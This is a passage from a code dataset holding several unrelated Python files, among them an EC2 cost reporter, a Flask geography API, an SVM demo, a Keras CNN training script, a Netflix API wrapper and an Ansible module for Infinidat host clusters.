job_data = retrieve_job_data(url, is_liked, count)\n print(\"Writing the new data on the file...\")\n write_in_existing_file(job_data)\n # with pd.option_context('display.max_rows', None, 'display.max_columns', None):\n # print(job_data.head(2))\n\n else:\n print(\"All links provided contain jobs already on the destination file\")\n print(\"No new data will be writen on the file\")\n\nelse:\n job_data = retrieve_job_data(new_job_ID_list, is_liked, count)\n write_in_new_file(job_data)\n with pd.option_context('display.max_rows', None, 'display.max_columns', None):\n print(job_data.head(2))\n\n\n# TODO\n# 1.Write README\n# 2.Clean code and improve comments\n# 3.Improve additional data part deleting the print(c)","sub_path":"ScrapeOfLikedJobs_Selenium.py","file_name":"ScrapeOfLikedJobs_Selenium.py","file_ext":"py","file_size_in_byte":10355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"426083043","text":"import logging\nlogger = logging.getLogger('isitfit')\n\nimport pandas as pd\nfrom tabulate import tabulate\n\n# https://pypi.org/project/termcolor/\nfrom termcolor import colored\n\nfrom isitfit.cost.redshift.reporter import ReporterBase\n\nclass ReporterAnalyzeEc2(ReporterBase):\n\n def postprocess(self, context_all):\n # unpack\n self.analyzer = context_all['analyzer']\n n_ec2_total, self.mm, n_ec2_analysed, region_include = context_all['n_ec2_total'], context_all['mainManager'], context_all['n_ec2_analysed'], context_all['region_include']\n\n # proceed\n cwau_val = 0\n if self.analyzer.sum_capacity!=0:\n cwau_val = self.analyzer.sum_used/self.analyzer.sum_capacity*100\n\n cwau_color = 'yellow'\n if cwau_val >= 70:\n cwau_color = 'green'\n elif cwau_val <= 30:\n cwau_color = 'red'\n\n dt_start = self.mm.StartTime.strftime(\"%Y-%m-%d\")\n dt_end = self.mm.EndTime.strftime(\"%Y-%m-%d\")\n\n ri_max = 3\n ri_ell = \"\" if len(region_include)<=ri_max else \"...\"\n ri_str = \", \".join(region_include[:ri_max])+ri_ell\n \n self.table = [\n {'color': '',\n 'label': \"Start date\",\n 'value': \"%s\"%dt_start\n },\n {'color': '',\n 'label': \"End date\",\n 'value': \"%s\"%dt_end\n },\n {'color': '',\n 'label': \"Regions\",\n 'value': \"%i (%s)\"%(len(region_include), ri_str)\n },\n {'color': '',\n 'label': \"EC2 machines (total)\",\n 'value': \"%i\"%n_ec2_total\n },\n {'color': '',\n 'label': \"EC2 machines (analysed)\",\n 'value': \"%i\"%n_ec2_analysed\n },\n {'color': 'cyan',\n 'label': \"Billed cost\",\n 'value': \"%0.0f $\"%self.analyzer.sum_capacity\n },\n {'color': 'cyan',\n 'label': \"Used cost\",\n 'value': \"%0.0f $\"%self.analyzer.sum_used\n },\n {'color': cwau_color,\n 'label': \"CWAU (Used/Billed)\",\n 'value': \"%0.0f %%\"%cwau_val\n },\n ]\n\n # done\n return context_all\n\n\n def display(self, context_all):\n def get_row(row):\n def get_cell(i):\n retc = row[i] if not row['color'] else colored(row[i], row['color'])\n return retc\n \n retr = [get_cell('label'), get_cell('value')]\n return retr\n\n dis_tab = [get_row(row) for row in self.table]\n\n # logger.info(\"Summary:\")\n logger.info(\"Cost-Weighted Average Utilization (CWAU) of the AWS EC2 account:\")\n logger.info(\"\")\n logger.info(tabulate(dis_tab, headers=['Field', 'Value']))\n logger.info(\"\")\n logger.info(\"For reference:\")\n logger.info(colored(\"* CWAU >= 70% is well optimized\", 'green'))\n logger.info(colored(\"* CWAU <= 30% is underused\", 'red'))\n\n return context_all\n\n\n def email(self, context_all):\n \"\"\"\n ctx - click context\n \"\"\"\n context_2 = {}\n context_2['emailTo'] = context_all['emailTo']\n context_2['click_ctx'] = context_all['click_ctx']\n context_2['dataType'] = 'cost analyze' # ec2, not redshift\n context_2['dataVal'] = {'table': self.table}\n super().email(context_2)\n\n return context_all\n\n\n\n\nclass ReporterOptimizeEc2(ReporterBase):\n\n def __init__(self):\n # for final csv file\n self.csv_fn_final = None\n\n # members that will contain the results of the optimization\n self.df_sort = None\n self.sum_val = None\n\n\n def postprocess(self, context_all):\n # unpack\n self.analyzer = context_all['analyzer']\n self.df_cat = context_all['df_cat']\n\n # process\n self._after_all()\n self._storecsv_all()\n return context_all\n\n def _after_all(self):\n df_all = pd.DataFrame(self.analyzer.ec2_classes)\n\n # if no data\n if df_all.shape[0]==0:\n self.df_sort = None\n self.sum_val = None\n return\n\n # merge current type hourly cost\n map_cost = self.df_cat[['API Name', 'cost_hourly']]\n df_all = df_all.merge(map_cost, left_on='instance_type', right_on='API Name', how='left').drop(['API Name'], axis=1)\n\n # merge the next-smaller instance type from the catalog for instances classified as Underused\n map_smaller = self.df_cat[['API Name', 'type_smaller', 'Linux On Demand cost_smaller']].rename(columns={'Linux On Demand cost_smaller': 'cost_hourly_smaller'})\n df_all = df_all.merge(map_smaller, left_on='instance_type', right_on='API Name', how='left').drop(['API Name'], axis=1)\n\n # merge next-larger instance type\n map_larger = self.df_cat[['API Name', 'type_smaller', 'cost_hourly']].rename(columns={'type_smaller': 'API Name', 'API Name': 'type_larger', 'cost_hourly': 'cost_hourly_larger'})\n df_all = df_all.merge(map_larger, left_on='instance_type', right_on='API Name', how='left').drop(['API Name'], axis=1)\n\n # convert from hourly to 3-months\n for fx1, fx2 in [('cost_3m', 'cost_hourly'), ('cost_3m_smaller', 'cost_hourly_smaller'), ('cost_3m_larger', 'cost_hourly_larger')]:\n df_all[fx1] = df_all[fx2] * 24 * 30 * 3\n df_all[fx1] = df_all[fx1].fillna(value=0).astype(int)\n\n # imply a recommended type\n from isitfit.cost.ec2.calculator_optimize import class2recommendedType, class2recommendedCost\n df_all['recommended_type'] = df_all.apply(class2recommendedType, axis=1)\n df_all['savings'] = df_all.apply(class2recommendedCost, axis=1)\n df_all['savings'] = df_all.savings.fillna(value=0).astype(int)\n\n # keep a subset of columns\n df_all = df_all[['region', 'instance_id', 'instance_type', 'classification_1', 'classification_2', 'cost_3m', 'recommended_type', 'savings', 'tags']]\n\n # display\n #df_all = df_all.set_index('classification_1')\n #for v in ['Idle', 'Underused', 'Overused', 'Normal']:\n # logger.info(\"\\nInstance classification_1: %s\"%v)\n # if v not in df_all.index:\n # logger.info(\"None\")\n # else:\n # logger.info(df_all.loc[[v]]) # use double brackets to maintain single-row dataframes https://stackoverflow.com/a/45990057/4126114\n #\n # logger.info(\"\\n\")\n\n # main results\n self.df_sort = df_all.sort_values(['savings'], ascending=True)\n self.sum_val = df_all.savings.sum()\n\n\n def _storecsv_all(self, *args, **kwargs):\n if self.df_sort is None:\n return\n\n import tempfile\n with tempfile.NamedTemporaryFile(prefix='isitfit-full-ec2-', suffix='.csv', delete=False) as csv_fh_final:\n self.csv_fn_final = csv_fh_final.name\n logger.debug(colored(\"Saving final results to %s\"%csv_fh_final.name, \"cyan\"))\n self.df_sort.to_csv(csv_fh_final.name, index=False)\n logger.debug(colored(\"Save complete\", \"cyan\"))\n\n\n def display(self, context_all):\n if self.df_sort is None:\n logger.info(colored(\"No EC2 instances found\", \"red\"))\n return context_all\n\n # display\n # Edit 2019-09-25 just show the full list. Will add filtering later. This way it's less ambiguous when all instances are \"Normal\"\n # self.df_sort.dropna(subset=['recommended_type'], inplace=True)\n \n # if no recommendations\n if self.df_sort.shape[0]==0:\n logger.info(colored(\"No optimizations from isitfit for this AWS EC2 account\", \"red\"))\n return context_all\n \n # if there are recommendations, show them\n sum_comment = \"extra cost\" if self.sum_val>0 else \"savings\"\n sum_color = \"red\" if self.sum_val>0 else \"green\"\n\n #logger.info(\"Optimization based on the following CPU thresholds:\")\n #logger.info(self.thresholds)\n #logger.info(\"\")\n logger.info(colored(\"Recommended %s: %0.0f $ (over the next 3 months)\"%(sum_comment, self.sum_val), sum_color))\n logger.info(\"\")\n\n # display dataframe\n from isitfit.utils import display_df\n display_df(\n \"Recommended EC2 size changes\",\n self.df_sort,\n self.csv_fn_final,\n self.df_sort.shape,\n logger\n )\n\n# with pd.option_context(\"display.max_columns\", 10):\n# logger.info(\"Details\")\n# if self.df_sort.shape[0]<=10:\n# logger.info(df2tabulate(self.df_sort))\n# else:\n# logger.info(df2tabulate(self.df_sort.head(n=5)))\n# logger.info(\"...\")\n# logger.info(df2tabulate(self.df_sort.tail(n=5)))\n# logger.info(\"\")\n# logger.info(colored(\"Table originally with %i rows is truncated for top and bottom 5 only.\"%self.df_sort.shape[0], \"cyan\"))\n# logger.info(colored(\"Consider filtering it with --n=x for the 1st x results or --filter-tags=foo using a value from your own EC2 tags.\", \"cyan\"))\n\n if self.analyzer.n!=-1:\n logger.info(colored(\"This table has been filtered for only the 1st %i underused results\"%self.analyzer.n, \"cyan\"))\n\n return context_all\n","sub_path":"isitfit/cost/ec2/reporter.py","file_name":"reporter.py","file_ext":"py","file_size_in_byte":8686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"428188145","text":"from flask import Blueprint\nfrom flask_restful import fields, marshal, Resource\n\nfrom .resource import *\n\nprov_fields = {\n 'id': fields.Integer,\n 'nama': fields.String\n}\n\nkab_fields = {\n 'id': fields.Integer,\n 'nama': fields.String,\n 'provinsi_id': fields.String\n}\n\n\ndef get_or_abort(id, lvl: int):\n if lvl == 1:\n try:\n query = models.GeoProvinsi.get_by_id(id)\n except models.GeoProvinsi.DoesNotExist:\n abort(404)\n else:\n return query\n elif lvl == 2:\n try:\n query = models.GeoKabupaten.select().where(models.GeoKabupaten.provinsi_id == id).get()\n except models.GeoKabupaten.DoesNotExist:\n abort(404)\n else:\n return query\n else:\n return abort(404)\n\n\nclass GetProv(Resource):\n # @login_required\n def get(self):\n prov = [marshal(prov, prov_fields)\n for prov in models.GeoProvinsi.select()]\n return {'success': True,\n 'data': prov}\n\n\nclass GetKab(Resource):\n # @login_required\n def get(self, id):\n get_or_abort(id, 2)\n\n kab = [marshal(kab, kab_fields)\n for kab in models.GeoKabupaten.select().where(models.GeoKabupaten.provinsi_id == id)]\n return {'success': True,\n 'data': kab}\n\n\ngeo_api = Blueprint('resources.geo', __name__)\napi = Api(geo_api)\napi.add_resource(GetProv, '/geo/provinsi', endpoint='geo/provinsi')\napi.add_resource(GetKab, '/geo/kabupaten/', endpoint='geo/kabupaten')\n","sub_path":"resources/geo.py","file_name":"geo.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"571608764","text":"import sys, os\nimport numpy as np\nsys.path.append(os.getcwd() + r'\\Modules')\nfrom sklearn.datasets import make_blobs\nfrom sklearn.model_selection import train_test_split\nimport SVM_SMO as SVM\nimport matplotlib.pyplot as plt\nimport Classification_Metrics as cm\n\ndef plot_line(model):\n z = np.linspace(-2, 3, 10)\n w = model.w\n b = model.b\n L = (-w[0] / w[1])* z - b / w[1] # 二维绘图\n plt.plot(z, L) # 绘制分离直线\n# end\n\ndef one_versus_all(X, y, k):\n \"\"\" one_versus_all & SMO 实现 \"\"\"\n m, n = X.shape\n testnum = np.int64(0.2* m)\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=testnum, random_state=0, stratify=y)\n H = np.empty(shape=(testnum, k)) # 置信度矩阵\n for i in range(k): # k元分类任务\n y_train_i = 2* (y_train == i).astype(np.int64).reshape(-1, 1) - 1 # 针对第 k类分类时的标签\n model = SVM.SVM_SMO() # 产生专门预测该类型的模型\n model.fit(X_train, y_train_i, N=10)\n y_pred_i = model.predict_confidence(X_test).reshape(-1, 1) # 列向量\n H[:, i] = y_pred_i.reshape(testnum,)\n plot_line(model)\n y_pred = np.argmax(H, axis=1) # 选取置信度最大的\n return y_pred, y_test\n\n\nk = 3\nX, y = make_blobs(n_samples=100, centers=k, n_features=2, cluster_std=0.2, random_state=0) # 保证数据是线性可分的\ny_pred, y_test = one_versus_all(X, y, k)\n\nplt.scatter(X[:, 0][y==0], X[:, 1][y==0], c='r', s=5)\nplt.scatter(X[:, 0][y==1], X[:, 1][y==1], c='b', s=5)\nplt.scatter(X[:, 0][y==2], X[:, 1][y==2], c='y', s=5)\nplt.scatter(X[:, 0][y==3], X[:, 1][y==3], c='purple', s=5)\n\nplt.show()\n","sub_path":"Project/Ink_Blot_Classification_Problem/Solution1.py","file_name":"Solution1.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"609368955","text":"#%%\r\n\r\nimport time\r\nstart_time = time.time()\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport os\r\nimport PIL\r\nimport tensorflow as tf\r\nimport pandas as pd\r\n\r\nfrom tensorflow import keras\r\nfrom tensorflow.keras import layers\r\nfrom tensorflow.keras.models import Sequential\r\n\r\nprint(\"TensorFlow version:\", tf.__version__)\r\nprint(\"Keras version:\", keras.__version__)\r\nprint(\"GPU is\", \"available\" if tf.config.list_physical_devices('GPU') else \"NOT AVAILABLE\")\r\n\r\nmodel_name = \"projekt_2_cnn\"\r\nmodel_path = 'G:/Projects/Datasets/models/Intel-Image-Classification/' + model_name +'.h5'\r\nfolder = 'G:/Projects/Datasets/Intel-Image-Classification/'\r\nprint(\"Data path: \", folder)\r\nprint(\"Model save path: \", model_path)\r\n\r\nbatch_size = 128\r\nimg_height = 150\r\nimg_width = 150\r\nvalidation_split = 0.3\r\nepochs=30\r\nwith_cache = False\r\n\r\nimport pathlib\r\ndata_dir = pathlib.Path(folder)\r\n\r\nprint(\"___Training dataset___\")\r\ntrain_ds = tf.keras.preprocessing.image_dataset_from_directory(\r\n pathlib.Path.joinpath(data_dir, \"train/\"),\r\n image_size=(img_height, img_width),\r\n batch_size=batch_size\r\n)\r\nprint(\"▔▔▔▔▔▔▔▔▔▔▔▔▔\")\r\n\r\nprint(\"___Validation dataset___\")\r\nval_ds = tf.keras.preprocessing.image_dataset_from_directory(\r\n pathlib.Path.joinpath(data_dir, \"test/\"),\r\n validation_split=validation_split,\r\n subset=\"validation\",\r\n seed=123,\r\n image_size=(img_height, img_width),\r\n batch_size=batch_size\r\n)\r\nprint(\"▔▔▔▔▔▔▔▔▔▔▔▔▔\")\r\n\r\nprint(\"___Test dataset___\")\r\ntest_ds = tf.keras.preprocessing.image_dataset_from_directory(\r\n pathlib.Path.joinpath(data_dir, \"test/\"),\r\n validation_split=validation_split,\r\n subset=\"training\",\r\n seed=123,\r\n image_size=(img_height, img_width),\r\n batch_size=batch_size\r\n)\r\nprint(\"▔▔▔▔▔▔▔▔▔▔▔▔▔\")\r\n\r\nclass_names = train_ds.class_names\r\nprint(\"Class names: \")\r\nprint(class_names)\r\n\r\nfor image_batch, labels_batch in train_ds:\r\n print(\"Shape:\")\r\n print(image_batch.shape)\r\n print(labels_batch.shape)\r\n break\r\n\r\nif(with_cache):\r\n AUTOTUNE = tf.data.experimental.AUTOTUNE\r\n print(AUTOTUNE)\r\n train_ds = train_ds.cache().shuffle(1000).prefetch(buffer_size=AUTOTUNE)\r\n val_ds = val_ds.cache().prefetch(buffer_size=AUTOTUNE)\r\ntrain_ds = train_ds.prefetch(buffer_size=32)\r\nval_ds = val_ds.prefetch(buffer_size=32)\r\n\r\ndata_augmentation = keras.Sequential([\r\n layers.experimental.preprocessing.RandomFlip(\"horizontal\", input_shape=(img_height, img_width,3)),\r\n layers.experimental.preprocessing.RandomRotation(0.1),\r\n layers.experimental.preprocessing.RandomZoom(0.1),\r\n])\r\n\r\ntime_start = time.time()\r\n\r\n\r\nmodel = Sequential([\r\n layers.experimental.preprocessing.Rescaling(\r\n 1./255, \r\n input_shape=(img_height, img_width,3)\r\n ),\r\n keras.layers.Conv2D(32, 3, activation='relu'),\r\n keras.layers.MaxPool2D(),\r\n layers.Dropout(0.1),\r\n\r\n keras.layers.Conv2D(16, 6, activation='relu'), \r\n keras.layers.MaxPool2D(),\r\n layers.Dropout(0.3),\r\n\r\n keras.layers.Conv2D(16, 10, activation='relu'), \r\n keras.layers.MaxPool2D(),\r\n layers.Dropout(0.3),\r\n\r\n keras.layers.Flatten(), \r\n\r\n keras.layers.Dense(128, activation='relu'), \r\n layers.Dropout(0.5),\r\n\r\n keras.layers.Dense(64, activation='relu'), \r\n layers.Dense(len(class_names))\r\n])\r\n\r\n\r\nmodel.compile(\r\n optimizer='adam',\r\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\r\n metrics=['accuracy'])\r\n\r\nmodel.summary()\r\n\r\nprint(\"----------------------------- Train -----------------------------\")\r\nhistory = model.fit(\r\n train_ds,\r\n validation_data=val_ds,\r\n epochs=epochs\r\n)\r\nprint(\"----------------------------------------------------------\")\r\n\r\nmodel.save(model_path)\r\n\r\nprint(\"----------------------------- Evaluate -----------------------------\")\r\ntest_scores = model.evaluate(test_ds)\r\nprint(test_scores)\r\n\r\nlabels = []\r\npredicions = []\r\ntest_accuracy = tf.keras.metrics.Accuracy()\r\nlabelsF = []\r\npredicionsF = []\r\nfor (x, y) in test_ds:\r\n logits = model(x, training=False)\r\n prediction = tf.argmax(logits, axis=1, output_type=tf.int32)\r\n predicions.append(prediction)\r\n labels.append(y)\r\n test_accuracy(prediction, y)\r\nprint(\" || Test set accuracy: {:.3%} \".format(test_accuracy.result()))\r\n\r\nfor y in labels:\r\n for y2 in y:\r\n labelsF.append(y2)\r\n \r\nfor y in predicions:\r\n for y2 in y:\r\n predicionsF.append(y2)\r\n\r\npredictions = model.predict(test_ds)\r\npredicted_class = np.argmax(predictions, axis=-1)\r\nfrom sklearn.metrics import confusion_matrix\r\ncm = confusion_matrix(labelsF, predicionsF)\r\n\r\ntime_end = time.time() - time_start\r\nprint(\"Czas Score: %.2f sec\" % (time_end))\r\nprint(\"Confusion matrix: \")\r\nprint(cm)\r\n\r\nprint(\"----------------------------------------------------------\")\r\n\r\nprint(\"----------------------------- Visualize results -----------------------------\")\r\ndef print_plot():\r\n acc = history.history['accuracy']\r\n val_acc = history.history['val_accuracy']\r\n loss = history.history['loss']\r\n val_loss = history.history['val_loss']\r\n\r\n plt.figure(figsize=(7,7))\r\n epochs_range = range(epochs)\r\n plt.plot(epochs_range, acc, '.-r', label='Training Accuracy')\r\n plt.plot(epochs_range, val_acc, '.-g', label='Validation Accuracy')\r\n plt.legend(loc='best')\r\n plt.title('Training and Validation Accuracy')\r\n\r\n plt.figure(figsize=(7,7))\r\n plt.plot(epochs_range, loss, '.-r', label='Training Loss')\r\n plt.plot(epochs_range, val_loss, '.-g', label='Validation Loss')\r\n plt.legend(loc='best')\r\n plt.title('Training and Validation Loss')\r\n plt.show()\r\n\r\nprint_plot()\r\n\r\nfrom tensorflow.keras.utils import plot_model\r\nplot_model(model, model_name+'_info.png', show_shapes=True)\r\n\r\nimport seaborn as sns\r\nplt.figure(figsize=(7, 7))\r\nsns.set(font_scale=1.1)\r\nax = plt.subplot()\r\nsns.heatmap(cm, annot=True, fmt=\"d\", ax = ax, annot_kws={\"size\": 14})\r\nax.set_xlabel('Predicted');ax.set_ylabel('Actual')\r\nax.set_title('Confusion Matrix')\r\nax.xaxis.set_ticklabels(class_names)\r\nax.yaxis.set_ticklabels(class_names)\r\nplt.show()\r\nprint(\"----------------------------------------------------------\")\r\n\r\nend_time = time.time() - start_time\r\nprint(\"\\nCzas: %.2f sec\" % (end_time))","sub_path":"projekt_2_cnn.py","file_name":"projekt_2_cnn.py","file_ext":"py","file_size_in_byte":6162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"474237600","text":"import json\r\nimport requests as req\r\n\r\n#all Code Written by Odin https://github.com/O-D-1-N\r\n\r\nclass Matchflix():\r\n def __init__(self, movieId):\r\n self.movieId = movieId\r\n \r\n def GetDetails(self):\r\n url = \"https://unogsng.p.rapidapi.com/title\"\r\n querystring = {\"netflixid\":self.movieId}\r\n headers = {\r\n 'x-rapidapi-host': \"unogsng.p.rapidapi.com\",\r\n 'x-rapidapi-key': \"api-KEY\"\r\n }\r\n response = req.request(\"GET\", url, headers=headers, params=querystring)\r\n self.Details = json.loads(response.content)\r\n\r\n def GetCountries(self):\r\n url = \"https://unogsng.p.rapidapi.com/titlecountries\"\r\n querystring = {\"netflixid\":self.movieId}\r\n headers = {\r\n 'x-rapidapi-host': \"unogsng.p.rapidapi.com\",\r\n 'x-rapidapi-key': \"api-KEY\"\r\n }\r\n response = req.request(\"GET\", url, headers=headers, params=querystring)\r\n obj = json.loads(response.content)\r\n countries = []\r\n i = 0\r\n for i in range(len(obj['results'])):\r\n country = obj['results'][i]['country']\r\n countries.append(country)\r\n i += 1\r\n self.Countries = countries\r\n \r\n def isInSweden(self):\r\n if 'Sweden' in str(self.Countries):\r\n return True\r\n else:\r\n return False\r\n def isInUK(self):\r\n if 'United Kingdom' in str(self.Countries):\r\n return True\r\n else:\r\n return False\r\n def isInAmerica(self):\r\n if 'United States' in str(self.Countries):\r\n return True\r\n else:\r\n return False \r\n def getTitle(self):\r\n obj = self.Details\r\n title = obj['results'][0]['title']\r\n return title\r\n def getPlot(self):\r\n obj = self.Details\r\n snippet = obj['results'][0]['imdbplot']\r\n return snippet\r\n def getImdbruntime(self):\r\n obj = self.Details\r\n runtime = obj['results'][0]['imdbruntime']\r\n return runtime\r\n def getYear(self):\r\n obj = self.Details\r\n year = obj['results'][0]['year']\r\n return year\r\n def getGenre(self):\r\n obj = self.Details\r\n genre = obj['results'][0]['imdbgenre']\r\n return genre\r\n def getMatlabel(self):\r\n obj = self.Details\r\n matlabel = obj['results'][0]['matlabel']\r\n return matlabel\r\n def getImg(self):\r\n obj = self.Details\r\n img = obj['results'][0]['img']\r\n return img\r\n def getSynopsis(self):\r\n obj = self.Details\r\n synopsis = obj['results'][0]['synopsis']\r\n return synopsis\r\n def getRuntime(self):\r\n obj = self.Details\r\n runtime = obj['results'][0]['imdbruntime']\r\n return runtime\r\n","sub_path":"MatchFlix.py","file_name":"MatchFlix.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"369878918","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# Copyright: (c) 2020, Infinidat \n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\nfrom __future__ import absolute_import, division, print_function\n__metaclass__ = type\nfrom infi.dtypes.iqn import make_iscsi_name\n\n\nANSIBLE_METADATA = {'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'community'}\n\n\nDOCUMENTATION = r'''\n---\nmodule: infini_cluster\nversion_added: 2.9\nshort_description: Create, Delete and Modify Host Cluster on Infinibox\ndescription:\n - This module creates, deletes or modifies host clusters on Infinibox.\nauthor: David Ohlemacher (@ohlemacher)\noptions:\n name:\n description:\n - Cluster Name\n required: true\n state:\n description:\n - Creates/Modifies Cluster when present, removes when absent, or provides\n details of a cluster when stat.\n required: false\n default: present\n choices: [ \"stat\", \"present\", \"absent\" ]\nextends_documentation_fragment:\n - infinibox\n'''\n\nEXAMPLES = r'''\n- name: Create new cluster\n infini_cluster:\n name: foo_cluster\n user: admin\n password: secret\n system: ibox001\n'''\n\n# RETURN = r''' # '''\n\nfrom ansible.module_utils.basic import AnsibleModule, missing_required_lib\nfrom ansible.module_utils.infinibox import \\\n HAS_INFINISDK, api_wrapper, infinibox_argument_spec, \\\n get_system, get_cluster, unixMillisecondsToDate, merge_two_dicts\n\n\n@api_wrapper\ndef get_host_by_name(system, host_name):\n \"\"\"Find a host by the name specified in the module\"\"\"\n host = None\n\n for a_host in system.hosts.to_list():\n a_host_name = a_host.get_name()\n if a_host_name == host_name:\n host = a_host\n break\n return host\n\n\n@api_wrapper\ndef create_cluster(module, system):\n print(\"create cluster\")\n changed = True\n if not module.check_mode:\n cluster = system.host_clusters.create(name=module.params['name'])\n cluster_hosts = module.params['cluster_hosts']\n for cluster_host in cluster_hosts:\n if cluster_host['host_cluster_state'] == 'present':\n host = get_host_by_name(system, cluster_host['host_name'])\n cluster.add_host(host)\n print(\"Added host {0} to cluster {1}\".format(host.get_name, cluster.get_name()))\n else:\n print(\"Skipped adding (absent) host {0} to cluster {1}\".format(host.get_name, cluster.get_name()))\n return changed\n\n\n@api_wrapper\ndef update_cluster(module, system, cluster):\n print(\"update cluster\")\n changed = False\n\n # e.g. of one host dict found in the module.params['cluster_hosts'] list:\n # {host_name: <'some_name'>, host_cluster_state: <'present' or 'absent'>}\n module_cluster_hosts = module.params['cluster_hosts']\n current_cluster_hosts_names = [host.get_name() for host in cluster.get_field('hosts')]\n print(\"current_cluster_hosts_names:\", current_cluster_hosts_names)\n for module_cluster_host in module_cluster_hosts:\n module_cluster_host_name = module_cluster_host['host_name']\n print(\"module_cluster_host_name:\", module_cluster_host_name)\n # Need to add host to cluster?\n if module_cluster_host_name not in current_cluster_hosts_names:\n if module_cluster_host['host_cluster_state'] == 'present':\n host = get_host_by_name(system, module_cluster_host_name)\n if not host:\n msg = 'Cannot find host {0} to add to cluster {1}'.format(\n module_cluster_host_name,\n cluster.get_name(),\n )\n module.fail_json(msg=msg)\n cluster.add_host(host)\n print(\"Added host {0} to cluster {1}\".format(host.get_name(), cluster.get_name()))\n changed = True\n # Need to remove host from cluster?\n elif module_cluster_host_name in current_cluster_hosts_names:\n if module_cluster_host['host_cluster_state'] == 'absent':\n host = get_host_by_name(system, module_cluster_host_name)\n if not host:\n msg = 'Cannot find host {0} to add to cluster {1}'.format(\n module_cluster_host_name,\n cluster.get_name(),\n )\n module.fail_json(msg=msg)\n cluster.remove_host(host)\n print(\"Removed host {0} from cluster {1}\".format(host.get_name(), cluster.get_name()))\n changed = True\n return changed\n\n\n@api_wrapper\ndef delete_cluster(module, cluster):\n assert cluster, \"Cluster not found\"\n changed = True\n if not module.check_mode:\n cluster.delete()\n return changed\n\n\ndef get_sys_cluster(module):\n system = get_system(module)\n cluster = get_cluster(module, system)\n return (system, cluster)\n\n\ndef get_cluster_fields(cluster):\n fields = cluster.get_fields(from_cache=True, raw_value=True)\n created_at, created_at_timezone = unixMillisecondsToDate(fields.get('created_at', None))\n field_dict = dict(\n hosts=[],\n id=cluster.id,\n created_at=created_at,\n created_at_timezone=created_at_timezone,\n )\n hosts = cluster.get_hosts()\n for host in hosts:\n host_dict = {\n 'host_id': host.id,\n 'host_name': host.get_name(),\n }\n field_dict['hosts'].append(host_dict)\n return field_dict\n\n\ndef handle_stat(module):\n system, cluster = get_sys_cluster(module)\n cluster_name = module.params[\"name\"]\n if not cluster:\n module.fail_json(msg='Cluster {0} not found'.format(cluster_name))\n field_dict = get_cluster_fields(cluster)\n result = dict(\n changed=False,\n msg='Cluster stat found'\n )\n result = merge_two_dicts(result, field_dict)\n module.exit_json(**result)\n\n\ndef handle_present(module):\n system, cluster = get_sys_cluster(module)\n cluster_name = module.params[\"name\"]\n if not cluster:\n changed = create_cluster(module, system)\n msg='Cluster {0} created'.format(cluster_name)\n module.exit_json(changed=changed, msg=msg)\n else:\n changed = update_cluster(module, system, cluster)\n if changed:\n msg='Cluster {0} updated'.format(cluster_name)\n else:\n msg='Cluster {0} required no changes'.format(cluster_name)\n module.exit_json(changed=changed, msg=msg)\n\n\ndef handle_absent(module):\n system, cluster = get_sys_cluster(module)\n cluster_name = module.params[\"name\"]\n if not cluster:\n changed = False\n msg=\"Cluster {0} already absent\".format(cluster_name)\n else:\n changed = delete_cluster(module, cluster)\n msg=\"Cluster {0} removed\".format(cluster_name)\n module.exit_json(changed=changed, msg=msg)\n\n\ndef execute_state(module):\n state = module.params['state']\n try:\n if state == 'stat':\n handle_stat(module)\n elif state == 'present':\n handle_present(module)\n elif state == 'absent':\n handle_absent(module)\n else:\n module.fail_json(msg='Internal handler error. Invalid state: {0}'.format(state))\n finally:\n system = get_system(module)\n system.logout()\n\n\ndef check_options(module):\n state = module.params['state']\n if state == 'present':\n if module.params['cluster_hosts'] is None:\n module.fail_json(msg='Option cluster_hosts, a list, must be provided')\n\n cluster_hosts = module.params['cluster_hosts']\n for host in cluster_hosts:\n try:\n # Check host has required keys\n valid_keys = ['host_name', 'host_cluster_state']\n for valid_key in valid_keys:\n _ = host[valid_key]\n # Check host has no unknown keys\n if len(host.keys()) != len(valid_keys):\n raise KeyError\n except KeyError:\n msg = 'With state present, all cluster_hosts ' \\\n + 'require host_name and host_cluster_state key:values ' \\\n + 'and no others'\n module.fail_json(msg=msg)\n\n\ndef main():\n argument_spec = infinibox_argument_spec()\n argument_spec.update(\n dict(\n name=dict(required=True),\n state=dict(default='present', choices=['stat', 'present', 'absent']),\n cluster_hosts=dict(required=False, type=list),\n )\n )\n\n module = AnsibleModule(argument_spec, supports_check_mode=True)\n\n if not HAS_INFINISDK:\n module.fail_json(msg=missing_required_lib('infinisdk'))\n\n check_options(module)\n execute_state(module)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"intro-ansible/venv3/lib/python3.8/site-packages/ansible_collections/infinidat/infinibox/plugins/modules/infini_cluster.py","file_name":"infini_cluster.py","file_ext":"py","file_size_in_byte":8819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"381655765","text":"#!/usr/bin/env python3\r\n# coding: utf-8\r\n# Author : xtrdb.net\r\n# File : memory_info.py\r\n# Time : 2017/12/22\r\n\r\n\r\nimport psutil\r\nimport pprint\r\n\r\ndef mem_get():\r\n mem_info = {}\r\n date = psutil.virtual_memory()\r\n mem_info[\"total\"] = date[0]/1024/1024/1024\r\n mem_info[\"available\"] = date[1]/1024/1024/1024\r\n\r\n html_str= \"\"\r\n for i,j in mem_info.items():\r\n html_str += \"\" %(i,j)\r\n html_str +=\"
    statusdata
    %s%.2f
